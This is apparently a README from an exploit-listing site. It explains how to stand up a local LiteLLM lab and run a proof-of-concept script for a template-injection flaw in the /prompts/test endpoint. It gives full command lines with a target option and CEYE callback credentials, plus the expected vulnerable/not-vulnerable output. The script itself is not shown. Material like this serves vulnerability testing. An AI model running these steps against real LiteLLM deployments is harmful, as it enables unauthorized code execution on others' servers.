## https://sploitus.com/exploit?id=289EA5D5-754D-5478-A3A8-B92C17FF9873
# LiteLLM CVE-2026-42203 PoC Usage Instructions
This document explains how to initiate a local LiteLLM environment and execute the `CVE-2026-42203.py` script to exploit the SSTI vulnerability in `/prompts/test`. Use this script only in a authorized local experimental environment. Do not direct the script towards unauthorized public targets.
## 1. Initialize the Local Environment
Enter the Lab directory and start LiteLLM, Postgres, and Prometheus:
```bash
docker compose up -d
```
Check the container status:
```bash
docker compose ps
```
Confirm that the services are accessible:
```bash
curl http://127.0.0.1:4000/
```
The default value of Master_Key is: sk-master-test-key-1234
## 2. Configure CEYE and LiteLLM Key
Access the configuration via: http://ceye.io/profile
Pass the parameters via the command line:
```bash
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
--auth 'sk-local-test-key' \
--ceye-domain 'your-id.ceye.io' \
--ceye-token 'your-ceye-api-token'
```
Variable Explanation:
- `LITELLM_API_KEY`: The access key for LiteLLM. In a local Docker environment, it usually corresponds to `LITELLM_MASTER_KEY` in the `.env` file.
- `CEYE_DOMAIN`: Your CEYE subdomain, e.g., `xxxxxx.ceye.io`.
- `CEYE_TOKEN`: Your CEYE API Token, used to query callback records.
## 3. Execute the PoC
Complete example:
```bash
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
--target http://127.0.0.1:4000 \
--auth 'sk-local-test-key' \
--ceye-domain 'your-id.ceye.io' \
--ceye-token 'your-ceye-api-token'
```
Key Parameters:
- `--target`: The address of the LiteLLM service, default is `http://127.0.0.1:4000`.
- `--auth` / `--api-key`: The key used to call `/prompts/test` on LiteLLM.
- `--ceye-domain`: The domain for CEYE callback.
- `--ceye-token`: Your CEYE API Token.
The script will automatically mask sensitive information during execution.
- `--wait`: Number of seconds to wait for CEYE to send a callback. Default is `20`.
- `--interval`: Interval between polls of CEYEโs records. Default is `3`.
- `--timeout`: Timeout for HTTP requests. Default is `10` seconds.
- `--insecure`: Add this parameter if the target uses self-signed HTTPS certificates. This disables TLS certificate verification.
## 4. Check Results
If CEYE receives a callback, the script will output:
```
[VULNERABLE] CEYE received the callback request.
```
If no callback is received within the wait time, the script will output:
```
[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.
```
[source-iocs-preserved url=http://127.0.0.1:4000`ใ]